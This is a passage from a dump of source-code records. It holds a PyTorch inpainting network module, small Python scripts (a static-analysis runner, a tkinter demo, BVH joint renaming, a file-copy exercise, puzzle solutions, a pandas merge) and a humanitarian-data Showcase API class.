self.branch5 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=6, dilation=6, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch6 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=8, dilation=8, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch7 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=10, dilation=10, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch8 = ConvBlock(input_nc, input_nc // 8, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n\n self.fusion9 = ConvBlock(input_nc, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type=pad_type, norm=norm, acti=None) \n\n def forward(self, x):\n d1 = self.branch1(x) \n d2 = self.branch2(x) \n d3 = self.branch3(x) \n d4 = self.branch4(x) \n d5 = self.branch5(x) \n d6 = self.branch6(x) \n d7 = self.branch7(x) \n d8 = self.branch8(x) \n d9 = torch.cat((d1, d2, d3, d4, d5, d6, d7, d8), dim=1) \n out = x + self.fusion9(d9) \n return out \n\n### Multi-Dilation ResnetBlock\nclass MultiDilationResnetBlock_v3(nn.Module): \n def __init__(self, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n super(MultiDilationResnetBlock_v3, self).__init__() \n\n self.branch1 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=2, dilation=2, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch2 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=3, dilation=3, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch3 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=4, dilation=4, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n self.branch4 = ConvBlock(input_nc, input_nc // 4, kernel_size=3, stride=1, padding=5, dilation=5, groups=1, bias=True, pad_type=pad_type, norm=norm, acti='relu') \n \n self.fusion5 = ConvBlock(input_nc, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type=pad_type, norm=norm, acti=None) \n\n def forward(self, x):\n d1 = self.branch1(x) \n d2 = self.branch2(x) \n d3 = self.branch3(x) \n d4 = self.branch4(x) \n d5 = torch.cat((d1, d2, d3, d4), dim=1) \n out = x + self.fusion5(d5) \n return out \n\n### ResnetBlock\nclass ResnetBlock(nn.Module): \n def __init__(self, input_nc, kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n super(ResnetBlock, self).__init__() \n self.conv_block = self.build_conv_block(input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout)\n\n\n def build_conv_block(self, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout):\n conv_block = [] \n conv_block += [ConvBlock(input_nc, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti='relu')]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)] \n conv_block += [ConvBlock(input_nc, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti=None)] \n\n return nn.Sequential(*conv_block) \n\n def forward(self, x):\n out = x + self.conv_block(x) \n return out \n\n### ResnetBlock\nclass ResnetBlock_v2(nn.Module): \n def __init__(self, input_nc, 
kernel_size=3, stride=1, padding=1, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti='relu', use_dropout=False): \n        super(ResnetBlock_v2, self).__init__() \n        self.conv_block = self.build_conv_block(input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout)\n\n\n    def build_conv_block(self, input_nc, kernel_size, stride, padding, dilation, groups, bias, pad_type, norm, acti, use_dropout):\n        conv_block = [] \n        conv_block += [ConvBlock(input_nc, input_nc, kernel_size=3, stride=1, padding=padding, dilation=dilation, groups=groups, bias=bias, pad_type=pad_type, norm=norm, acti='elu')]\n        if use_dropout:\n            conv_block += [nn.Dropout(0.5)] \n        conv_block += [ConvBlock(input_nc, input_nc, kernel_size=1, stride=1, padding=0, dilation=1, groups=1, bias=True, pad_type='reflect', norm='instance', acti=None)] \n\n        return nn.Sequential(*conv_block) \n\n    def forward(self, x):\n        out = x + self.conv_block(x) \n        return out \n\n### NonLocalBlock2D \nclass NonLocalBlock(nn.Module): \n    def __init__(self, input_nc, inter_nc=None, sub_sample=True, bn_layer=True): \n        super(NonLocalBlock, self).__init__() \n        self.input_nc = input_nc \n        self.inter_nc = inter_nc \n\n        if inter_nc is None: \n            self.inter_nc = input_nc // 2\n\n        self.g = nn.Conv2d(in_channels=self.input_nc, out_channels=self.inter_nc, kernel_size=1, stride=1, padding=0) \n\n        if bn_layer: \n            self.W = nn.Sequential(\n                nn.Conv2d(in_channels=self.inter_nc, out_channels=self.input_nc, kernel_size=1, stride=1, padding=0), \n                nn.BatchNorm2d(self.input_nc) \n            )\n            # zero init keeps the whole block an identity mapping at the start of training\n            self.W[0].weight.data.zero_()\n            self.W[0].bias.data.zero_() \n        else:\n            self.W = nn.Conv2d(in_channels=self.inter_nc, out_channels=self.input_nc, kernel_size=1, stride=1, padding=0) \n            self.W.weight.data.zero_()\n            self.W.bias.data.zero_() \n\n        self.theta = nn.Conv2d(in_channels=self.input_nc, out_channels=self.inter_nc, kernel_size=1, stride=1, padding=0)\n        self.phi = nn.Conv2d(in_channels=self.input_nc, out_channels=self.inter_nc, kernel_size=1, stride=1, padding=0) \n\n        if sub_sample:\n            self.g = nn.Sequential(self.g, nn.MaxPool2d(kernel_size=(2, 2)))\n            self.phi = nn.Sequential(self.phi, nn.MaxPool2d(kernel_size=(2, 2))) \n\n    def forward(self, x): \n        batch_size = x.size(0) \n\n        g_x = self.g(x).view(batch_size, self.inter_nc, -1) \n        g_x = g_x.permute(0, 2, 1) \n\n        theta_x = self.theta(x).view(batch_size, self.inter_nc, -1) \n        theta_x = theta_x.permute(0, 2, 1) \n\n        phi_x = self.phi(x).view(batch_size, self.inter_nc, -1) \n\n        # pairwise affinity between all spatial positions, softmax-normalized per row\n        f = torch.matmul(theta_x, phi_x) \n        f_div_C = F.softmax(f, dim=-1) \n\n        y = torch.matmul(f_div_C, g_x) \n        y = y.permute(0, 2, 1).contiguous() \n        y = y.view(batch_size, self.inter_nc, *x.size()[2:]) \n        W_y = self.W(y) \n\n        z = W_y + x\n        return z \n\n### ConvBlock\nclass ConvBlock(nn.Module):\n    def __init__(self, input_nc, output_nc, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, pad_type='zero', norm=None, acti='lrelu'):\n        super(ConvBlock, self).__init__() \n        self.use_bias = bias \n\n        # initialize padding \n        if pad_type == 'reflect':\n            self.pad = nn.ReflectionPad2d(padding)\n        elif pad_type == 'zero':\n            self.pad = nn.ZeroPad2d(padding) \n        elif pad_type == 'replicate': \n            self.pad = nn.ReplicationPad2d(padding)\n        else:\n            assert 0, \"Unsupported padding type: {}\".format(pad_type) \n\n        # initialize normalization\n        if norm == 'batch':\n            self.norm = nn.BatchNorm2d(output_nc) \n        elif norm == 'instance':\n            self.norm = nn.InstanceNorm2d(output_nc) \n        elif norm is None or norm == 'spectral': \n            self.norm = None \n        
else: \n assert 0, \"Unsupported normalization: {}\".format(norm) \n\n # initialize activation\n if acti == 'relu':\n self.acti = nn.ReLU(inplace=True) \n elif acti == 'lrelu':\n self.acti = nn.LeakyReLU(0.2, inplace=True) \n elif acti == 'prelu':\n self.acti = nn.PReLU() \n elif acti == 'elu':\n self.acti = nn.ELU() \n elif acti == 'tanh':\n self.acti = nn.Tanh() \n elif acti == 'sigmoid':\n self.acti = nn.Sigmoid() \n elif acti is None:\n self.acti = None \n else: \n assert 0, \"Unsupported activation: {}\".format(acti) \n\n # initialize convolution \n if norm == 'spectral': \n self.conv = SpectralNorm(nn.Conv2d(input_nc, output_nc, kernel_size, stride, dilation=dilation, groups=groups, bias=self.use_bias))\n else:\n self.conv = nn.Conv2d(input_nc, output_nc, kernel_size, stride, dilation=dilation, groups=groups, bias=self.use_bias) \n\n def forward(self, x):\n x = self.conv(self.pad(x)) \n if self.norm:\n x = self.norm(x)\n if self.acti:\n x = self.acti(x)\n return x \n\ndef l2normalize(v, eps=1e-12):\n return v / (v.norm() + eps) \n\n### SpectralNorm \nclass SpectralNorm(nn.Module):\n \"\"\"\n Spectral Normalization for Generative Adversarial Networks\n Pytorch implementation https://github.com/christiancosgrove/pytorch-spectral-normalization-gan \n \"\"\"\n def __init__(self, module, name='weight', power_iterations=1):\n super(SpectralNorm, self).__init__() \n self.module = module \n self.name = name \n self.power_iterations = power_iterations \n if not self._made_params():\n self._make_params() \n \n def _update_u_v(self):\n u = getattr(self.module, self.name + \"_u\") \n v = getattr(self.module, self.name + \"_v\") \n w = getattr(self.module, self.name + \"_bar\") \n\n height = w.data.shape[0] \n for _ in range(self.power_iterations): \n v.data = l2normalize(torch.mv(torch.t(w.view(height,-1).data), u.data)) \n u.data = l2normalize(torch.mv(w.view(height,-1).data, v.data)) \n\n sigma = u.dot(w.view(height, -1).mv(v)) \n setattr(self.module, self.name, w / sigma.expand_as(w)) \n\n def _made_params(self):\n try: \n u = getattr(self.module, self.name + \"_u\") \n v = getattr(self.module, self.name + \"_v\") \n w = getattr(self.module, self.name + \"_bar\") \n return True \n except AttributeError:\n return False \n\n def _make_params(self): \n w = getattr(self.module, self.name) \n\n height = w.data.shape[0] \n width = w.view(height, -1).data.shape[1] \n\n u = nn.Parameter(w.data.new(height).normal_(0, 1), requires_grad=False) \n v = nn.Parameter(w.data.new(width).normal_(0, 1), requires_grad=False) \n u.data = l2normalize(u.data) \n v.data = l2normalize(v.data) \n w_bar = nn.Parameter(w.data) \n\n del self.module._parameters[self.name] \n\n self.module.register_parameter(self.name + \"_u\", u) \n self.module.register_parameter(self.name + \"_v\", v) \n self.module.register_parameter(self.name + \"_bar\", w_bar) \n\n def forward(self, *args):\n self._update_u_v() \n return self.module.forward(*args) \n\n","sub_path":"2020ECCV-DeepGIN Deep Generative Inpainting Network for Extreme Image Inpainting/Task1-Pytorch/models/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":35618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"198282213","text":"import sys\nimport os.path\nimport system\nimport dirutils\nimport tempfile\nfrom itertools import takewhile\n\ntemp_path = os.path.abspath(sys.argv[1])\ndirectory = os.path.abspath(sys.argv[2])\ncsv = os.path.abspath(sys.argv[3])\nexe = sys.argv[4]\nif (len(sys.argv) > 
5):\n    opts = sys.argv[5]\nelse:\n    opts = \"\"\n\nprint(\"======Running uno=======\")\nprint(\"Working dir:\", directory)\nprint(\"CSV file:\", csv)\nprint(\"Executable:\", exe)\nprint(\"Executable options:\", opts)\n\nc_files = dirutils.list_files(directory, '.c') + dirutils.list_files(directory, '.cpp')\n(output, err, exit, time) = system.system_call(exe + \" \" + \" \".join(c_files) + \" \" + opts, directory)\n\ntemp_file = open(temp_path, 'w')\ntemp_file.write(output.decode(\"utf-8\"))\ntemp_file.close()\n\nsys.stdout = open(csv, \"w\")\nprint(\"File, Line, Error\")\nwith open(temp_path) as f:\n    for line in f.readlines():\n        a = line.strip().split(\":\")\n        if (len(a) >= 4) and (a[0] == 'uno'):\n            if len(a[2]) > 10: # hack to work around bug in printing wrong array indexing\n                print(os.path.basename(a[1]), \",\", ''.join(takewhile(str.isdigit, a[2].strip())), \",\", a[2])\n            else:\n                print(os.path.basename(a[1]), \",\", a[2], \",\", a[3])\n\nsys.stdout = sys.__stdout__ \nprint(\"======Done with uno=======\")\n","sub_path":"python/uno.py","file_name":"uno.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"139314908","text":"from tkinter import *\nfrom tkinter import messagebox\n\nmyGui = Tk()\n\ndef hello():\n    b = a.get()\n    myLabel3 = Label(text = b, fg = 'red', bg = 'yellow', font = 10)\n    myLabel3.pack()\n\ndef dele():\n    myLabel1 = Label(text = 'deleted', fg = 'red', bg = 'yellow', font = 10)\n    myLabel1.pack()\n\ndef newfi():\n    myLabel1 = Label(text = 'clicked on new file', fg = 'red', bg = 'yellow', font = ('roman', 24, 'italic'))\n    myLabel1.pack()\n\ndef mbox():\n    messagebox.showinfo(title='Save', message = 'Are you sure you want to save?')\n\ndef mquit():\n    mess = messagebox.askyesno(title = 'Quit', message = 'Are you sure you want to quit?')\n    if mess == 1:\n        myGui.destroy()\n\n\na = StringVar()\nmyGui.title('Hello')\nmyGui.geometry('500x500+100+100')\n\nmyLabel1 = Label(text = 'label one', fg = 'red', bg = 'yellow', font = ('arial', 24, 'italic')).pack()\nmyButton1 = Button(text = 'Enter', fg = '#2f363d', bg = '#9EC129', command = hello, font = ('times', 24, 'bold')).pack()\nmyButton2 = Button(text = 'Delete', fg = '#0D0000', bg = '#8B0000', command = dele, font = 20).pack()\ntext = Entry(textvariable = a).pack()\n\nmymenu = Menu()\nlistone = Menu()\nlisttwo = Menu()\n\nlistone.add_command(label = 'New File', command = newfi)\nlistone.add_command(label = 'Open File')\nlistone.add_command(label = 'Save File', command = mbox)\nlistone.add_command(label = 'Quit', command = mquit)\n\nlisttwo.add_command(label = 'undo')\nlisttwo.add_command(label = 'redo')\n\nmymenu.add_cascade(label = 'File', menu = listone)\nmymenu.add_cascade(label = 'Edit', menu = listtwo)\nmymenu.add_cascade(label = 'Format')\nmymenu.add_cascade(label = 'Run')\n\nmyGui.config(menu = mymenu)\n\n\n\nmyGui.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"240584322","text":"# rename joints of adun\n#\n# shoulder2 -> shoulder_r\n# elbow -> elbow_r\n# radioulnar -> radioulnar_r\n# shoulder2_l -> shoulder_l\n\nimport cPickle\n\nimport sys\nif '../../../PyCommon/modules' not in sys.path:\n    sys.path.append('../../../PyCommon/modules')\nimport Resource.ysMotionLoader as yml\nimport Resource.dcVRMLLoader as dvl\nimport numpy.core.multiarray\n\ndef buildJointMap():\n    jointMap = {}\n    
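# original adun joint name -> side-suffixed name, as listed in the header comment\n    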
jointMap[\"shoulder2\"] = \"shoulder_r\"\n jointMap[\"elbow\"] = \"elbow_r\"\n jointMap[\"radioulnar\"] = \"radioulnar_r\"\n jointMap[\"shoulder2_l\"] = \"shoulder_l\"\n return jointMap\n\ndef renameBvhJoint(bvh):\n jointMap = buildJointMap()\n for joint in bvh.joints:\n for k in jointMap.keys():\n if joint.name == k:\n joint.name = jointMap[k]\n \n return bvh\n\ndef renameWrlJoint(wrl):\n jointMap = buildJointMap()\n for joint in wrl.joints:\n for k in jointMap.keys():\n if joint.name == k:\n joint.name = jointMap[k]\n\n return wrl\n\ndef renameMuscleJoint(msclDict):\n # rename joint names of path points of muscles\n jointMap = buildJointMap()\n \n for mscl in msclDict.values():\n pathPointSet = mscl[\"GeometryPath\"][\"PathPointSet\"]\n for pathPoint in pathPointSet.values():\n for k in jointMap.keys():\n if pathPoint[\"joint\"] == k:\n pathPoint[\"joint\"] = jointMap[k]\n\n return msclDict\n\nif __name__=='__main__':\n\n bvhFilePath = './ad.bvh'\n msclFilePath = './mscl'\n\n bvh = yml.readBvhFileAsBvh(bvhFilePath)\n bvh = renameBvhJoint(bvh)\n bvh.writeBvhFile(bvhFilePath)\n \n msclFile = open(msclFilePath, 'rb')\n msclDict = cPickle.load(msclFile)\n msclFile.close()\n msclDict = renameMuscleJoint(msclDict)\n msclFile = open(msclFilePath, 'wb')\n cPickle.dump(msclDict, msclFile)\n msclFile.close()\n","sub_path":"Tracking/Model/ad/renameJoint.py","file_name":"renameJoint.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"543254070","text":"import sys\n\nDAYS=int(sys.argv[2])\nSTART_VALUE = 6\n\ndata = [0] * 9\nfor i in open(sys.argv[1], 'r').read().split(','):\n data[int(i)] += 1\n\nfor _ in range(1, DAYS):\n spawn_count=data[0]\n data=data[1:]\n data[START_VALUE] += spawn_count\n data.append(spawn_count)\nprint(sum(data))\n","sub_path":"2021/06/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"373531967","text":"'''\np\np y\np y t\np y t h\np y t h o\np y t h o n\n'''\nstring = input(\"Enter a string ....\")\n\nlength = len(string)\n\nfor row in range(length):\n for col in range(row+1):\n print(string[col],end=' ')\n print()\n","sub_path":"numaric and star/parttern_8.py","file_name":"parttern_8.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"301368914","text":"# -*- coding: utf-8 -*-\n\"\"\"Showcase class containing all logic for creating, checking, and updating showcases.\"\"\"\nimport logging\nfrom os.path import join\nfrom typing import List, Union, Optional, Dict\n\nimport hdx.data.dataset\nimport hdx.data.hdxobject\nfrom hdx.hdx_configuration import Configuration\nfrom hdx.utilities import is_valid_uuid\n\nlogger = logging.getLogger(__name__)\n\n\nclass Showcase(hdx.data.hdxobject.HDXObject):\n \"\"\"Showcase class containing all logic for creating, checking, and updating showcases.\n\n Args:\n initial_data (Optional[Dict]): Initial showcase metadata dictionary. Defaults to None.\n configuration (Optional[Configuration]): HDX configuration. 
Defaults to global configuration.\n \"\"\"\n dataset_ids_field = 'dataset_ids'\n\n def __init__(self, initial_data=None, configuration=None):\n # type: (Optional[Dict], Optional[Configuration]) -> None\n if not initial_data:\n initial_data = dict()\n super(Showcase, self).__init__(initial_data, configuration=configuration)\n\n @staticmethod\n def actions():\n # type: () -> Dict[str, str]\n \"\"\"Dictionary of actions that can be performed on object\n\n Returns:\n Dict[str, str]: Dictionary of actions that can be performed on object\n \"\"\"\n return {\n 'show': 'ckanext_showcase_show',\n 'update': 'ckanext_showcase_update',\n 'create': 'ckanext_showcase_create',\n 'delete': 'ckanext_showcase_delete',\n 'list': 'ckanext_showcase_list',\n 'associate': 'ckanext_showcase_package_association_create',\n 'disassociate': 'ckanext_showcase_package_association_delete',\n 'list_datasets': 'ckanext_showcase_package_list',\n 'list_showcases': 'ckanext_package_showcase_list'\n }\n\n def update_from_yaml(self, path=join('config', 'hdx_showcase_static.yml')):\n # type: (str) -> None\n \"\"\"Update showcase metadata with static metadata from YAML file\n\n Args:\n path (Optional[str]): Path to YAML dataset metadata. Defaults to config/hdx_showcase_static.yml.\n\n Returns:\n None\n \"\"\"\n super(Showcase, self).update_from_yaml(path)\n\n def update_from_json(self, path=join('config', 'hdx_showcase_static.json')):\n # type: (str) -> None\n \"\"\"Update showcase metadata with static metadata from JSON file\n\n Args:\n path (Optional[str]): Path to JSON dataset metadata. Defaults to config/hdx_showcase_static.json.\n\n Returns:\n None\n \"\"\"\n super(Showcase, self).update_from_json(path)\n\n @staticmethod\n def read_from_hdx(identifier, configuration=None):\n # type: (str, Optional[Configuration]) -> Optional['Showcase']\n \"\"\"Reads the showcase given by identifier from HDX and returns Showcase object\n\n Args:\n identifier (str): Identifier of showcase\n configuration (Optional[Configuration]): HDX configuration. Defaults to global configuration.\n\n Returns:\n Optional[Showcase]: Showcase object if successful read, None if not\n \"\"\"\n\n showcase = Showcase(configuration=configuration)\n result = showcase._load_from_hdx('showcase', identifier)\n if result:\n return showcase\n return None\n\n def check_required_fields(self, ignore_fields=list()):\n # type: (List[str]) -> None\n \"\"\"Check that metadata for showcase is complete. The parameter ignore_fields should\n be set if required to any fields that should be ignored for the particular operation.\n\n Args:\n ignore_fields (List[str]): Fields to ignore. 
Default is [].\n\n        Returns:\n            None\n        \"\"\"\n        self._check_required_fields('showcase', ignore_fields)\n\n    def update_in_hdx(self):\n        # type: () -> None\n        \"\"\"Check if showcase exists in HDX and if so, update it\n\n        Returns:\n            None\n        \"\"\"\n        self._update_in_hdx('showcase', 'name')\n\n    def create_in_hdx(self):\n        # type: () -> None\n        \"\"\"Check if showcase exists in HDX and if so, update it, otherwise create it\n\n        Returns:\n            None\n        \"\"\"\n        self._create_in_hdx('showcase', 'name', 'title')\n\n    def delete_from_hdx(self):\n        # type: () -> None\n        \"\"\"Deletes a showcase from HDX.\n\n        Returns:\n            None\n        \"\"\"\n        self._delete_from_hdx('showcase', 'id')\n\n    def get_tags(self):\n        # type: () -> List[str]\n        \"\"\"Return the showcase's list of tags\n\n        Returns:\n            List[str]: List of tags or [] if there are none\n        \"\"\"\n        return self._get_tags()\n\n    def add_tag(self, tag):\n        # type: (str) -> bool\n        \"\"\"Add a tag\n\n        Args:\n            tag (str): Tag to add\n\n        Returns:\n            bool: True if tag added or False if tag already present\n        \"\"\"\n        return self._add_tag(tag)\n\n    def add_tags(self, tags):\n        # type: (List[str]) -> bool\n        \"\"\"Add a list of tags\n\n        Args:\n            tags (List[str]): List of tags to add\n\n        Returns:\n            bool: Returns True if all tags added or False if any already present.\n        \"\"\"\n        return self._add_tags(tags)\n\n    def remove_tag(self, tag):\n        # type: (str) -> bool\n        \"\"\"Remove a tag\n\n        Args:\n            tag (str): Tag to remove\n\n        Returns:\n            bool: True if tag removed or False if not\n        \"\"\"\n        return self._remove_hdxobject(self.data.get('tags'), tag, matchon='name')\n\n    def get_datasets(self):\n        # type: () -> List[hdx.data.dataset.Dataset]\n        \"\"\"Get any datasets in the showcase\n\n        Returns:\n            List[Dataset]: List of datasets\n        \"\"\"\n        assoc_result, datasets_dicts = self._read_from_hdx('showcase', self.data['id'], fieldname='showcase_id',\n                                                           action=self.actions()['list_datasets'])\n        datasets = list()\n        if assoc_result:\n            for dataset_dict in datasets_dicts:\n                dataset = hdx.data.dataset.Dataset(dataset_dict, configuration=self.configuration)\n                datasets.append(dataset)\n        return datasets\n\n    def _get_showcase_dataset_dict(self, dataset):\n        # type: (Union[hdx.data.dataset.Dataset,Dict,str]) -> Dict\n        \"\"\"Get showcase dataset dict\n\n        Args:\n            dataset (Union[Dataset,Dict,str]): Either a dataset id or dataset metadata from a Dataset object or dictionary\n\n        Returns:\n            Dict: showcase dataset dict\n        \"\"\"\n        if isinstance(dataset, hdx.data.dataset.Dataset) or isinstance(dataset, dict):\n            if 'id' not in dataset:\n                dataset = hdx.data.dataset.Dataset.read_from_hdx(dataset['name'])\n            dataset = dataset['id']\n        elif not isinstance(dataset, str):\n            raise hdx.data.hdxobject.HDXError('Type %s cannot be added as a dataset!' % type(dataset).__name__)\n        if is_valid_uuid(dataset) is False:\n            raise hdx.data.hdxobject.HDXError('Dataset %s does not look like a dataset id!' % dataset)\n        return {'showcase_id': self.data['id'], 'package_id': dataset}\n\n    def add_dataset(self, dataset, datasets_to_check=None):\n        # type: (Union[hdx.data.dataset.Dataset,Dict,str], List[hdx.data.dataset.Dataset]) -> bool\n        \"\"\"Add a dataset\n\n        Args:\n            dataset (Union[Dataset,Dict,str]): Either a dataset id or dataset metadata either from a Dataset object or a dictionary\n            datasets_to_check (List[Dataset]): List of datasets against which to check existence of dataset. 
Defaults to datasets in showcase.\n\n Returns:\n bool: True if the dataset was added, False if already present\n \"\"\"\n showcase_dataset = self._get_showcase_dataset_dict(dataset)\n if datasets_to_check is None:\n datasets_to_check = self.get_datasets()\n for dataset in datasets_to_check:\n if showcase_dataset['package_id'] == dataset['id']:\n return False\n self._write_to_hdx('associate', showcase_dataset, 'package_id')\n return True\n\n def add_datasets(self, datasets, datasets_to_check=None):\n # type: (List[Union[hdx.data.dataset.Dataset,Dict,str]], List[hdx.data.dataset.Dataset]) -> bool\n \"\"\"Add multiple datasets\n\n Args:\n datasets (List[Union[Dataset,Dict,str]]): A list of either dataset ids or dataset metadata from Dataset objects or dictionaries\n datasets_to_check (List[Dataset]): List of datasets against which to check existence of dataset. Defaults to datasets in showcase.\n\n Returns:\n bool: Returns True if all datasets added or False if any already present\n \"\"\"\n if datasets_to_check is None:\n datasets_to_check = self.get_datasets()\n alldatasetsadded = True\n for dataset in datasets:\n if not self.add_dataset(dataset, datasets_to_check=datasets_to_check):\n alldatasetsadded = False\n return alldatasetsadded\n\n def remove_dataset(self, dataset):\n # type: (Union[Dataset,Dict,str]) -> None\n \"\"\"Remove a dataset\n\n Args:\n dataset (Union[Dataset,Dict,str]): Either a dataset id or dataset metadata either from a Dataset object or a dictionary\n\n Returns:\n None\n \"\"\"\n self._write_to_hdx('disassociate', self._get_showcase_dataset_dict(dataset), 'package_id')\n","sub_path":"src/hdx/data/showcase.py","file_name":"showcase.py","file_ext":"py","file_size_in_byte":9546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"92226467","text":"# Learn Python the hard way\n# ex17.py lpthw\n\nfrom sys import argv\nfrom os.path import exists\n\n#script name test.txt test2.txt the arguments that I gave\nscript, from_file, to_file = argv\n\n#name of the file1(test.txt) and name of the file2(test2.txt)\nprint (\"Copying from %s to %s\" % (from_file, to_file))\n\n# we could do these two on one line too, how?\n#we use in file to open the from_file(the file we want to copy)\n#in_file = open(from_file)\n#indata = in_file.read()\nindata = open(from_file).read()\n\n\n#prints the file size\nprint (\"The input file is %d bytes long\" % len(indata))\n\n#True if the file alread exists False if it doesn't\nprint (\"Does the output file exist? 
%r\" % exists(to_file))\nprint (\"Ready, hit RETURN to continue, CTRL-C to abort.\")\nraw_input()\n\n#we use out_file to open the to_file(the file we want to copy)\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nprint (\"Alright, all done.\")\n\nout_file.close()\n#in_file.close()\n","sub_path":"ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"518362154","text":"n = int(input())\r\n\r\narr = [ list(map(int,input())) for _ in range(n)]\r\n\r\ndef dfs(x,y,n):\r\n\r\n if n == 1:\r\n print(arr[x][y],end='')\r\n return\r\n \r\n if n>=2:\r\n s = 0\r\n #가지치기 \r\n for i in range(x, x+n):\r\n for j in range(y, y+n):\r\n s+=arr[i][j]\r\n if s == 0:\r\n print('0',end='')\r\n elif s == 1*(n**2):\r\n print('1',end='')\r\n else:\r\n print('(',end='')\r\n n = n // 2\r\n dfs(x,y,n)\r\n dfs(x,y+n,n)\r\n dfs(x+n,y,n)\r\n dfs(x+n,y+n,n)\r\n print(')',end='')\r\n\r\ndfs(0,0,n)","sub_path":"백준/Silver/1992. 쿼드트리/쿼드트리.py","file_name":"쿼드트리.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"282670525","text":"# 1252 - SORT USING MOD (C/C++ LIKE) AND KEY FUNCTION WITH TERNARY AND BITWISE OPERATORS\r\ndef main():\r\n from sys import stdin\r\n\r\n keynum = lambda num: (abs(num) % M * (1 if num >= 0 else -1),\r\n -1 * (num & 1), num * (-1 if num & 1 else 1))\r\n\r\n while True:\r\n entry = input()\r\n print(entry)\r\n if entry == '0 0':\r\n break\r\n\r\n N, M = [int(x) for x in entry.split()]\r\n nums = [int(stdin.readline()) for _ in range(N)]\r\n nums.sort(key=keynum)\r\n print('\\n'.join(map(str, nums)))\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"problems/python/1252.py","file_name":"1252.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"411895633","text":"import pandas as pd\n\n#MERGE THE COLUMNS FROM THE TWO DATASETS WITH EARLIEST AND 6 MO TAGS\npd.set_option('display.max_rows', 100)\n\ndf1 = pd.read_csv(\"step4_result_earliest_tags.csv\")\ndf2 = pd.read_csv(\"step3_tags_after_6_mo.csv\")\n\n# CHANGE THE NAMES OF THE COLUMNS IN THE 6 MONTH DF STARTING AFTER WITH 14\n\n\nfor colnum in range(13,len(df2.columns)): #because 0 indexed to start at 14th column use 13\n \n orig_col_name = df2.columns[colnum]\n new_col_name = f\"t6_{orig_col_name}\"\n df2.rename(columns = {orig_col_name : new_col_name}, inplace = True)\n\nprint(len(df1.columns))\nprint(len(df2.columns))\n\nmgd_df = pd.merge(df1, df2, on=\"app_id\")\n\nprint(len(mgd_df.columns))\n\nmgd_df.drop(mgd_df.filter(regex='_y').columns, axis=1, inplace=True)\n# mgd_df = mgd_df.loc[:,~mgd_df.columns.str.endswith('_y')]\n\nprint(len(mgd_df.columns))\n\n## SOME TAGS ARE MISSPELT OR DONT EXIST ANYMORE SO REMOVE THEM ### YOU DON\"T NEED TO DO THIS ANYMORE B/C YOU DID IT IN STEP 2\n#mgd_df = mgd_df.drop('tag_999999', 1)\n#mgd_df = mgd_df.drop('t6_tag_999999', 1)\n#mgd_df = mgd_df.drop('tag_5144', 1)\n#mgd_df = mgd_df.drop('t6_tag_5144', 1)\n#mgd_df = mgd_df.drop('tag_1694', 1)\n#mgd_df = mgd_df.drop('t6_tag_1694', 1)\n#mgd_df = mgd_df.drop('tag_134316', 1)\n#mgd_df = mgd_df.drop('t6_tag_134316', 1)\n\n# mgd_df.drop(mgd_df.filter(regex='999999').columns, axis=1, inplace=True)\n# mgd_df.drop(mgd_df.filter(regex='5144').columns, axis=1, inplace=True)\n# mgd_df.drop(mgd_df.filter(regex='1694').columns, axis=1, inplace=True)\n# 
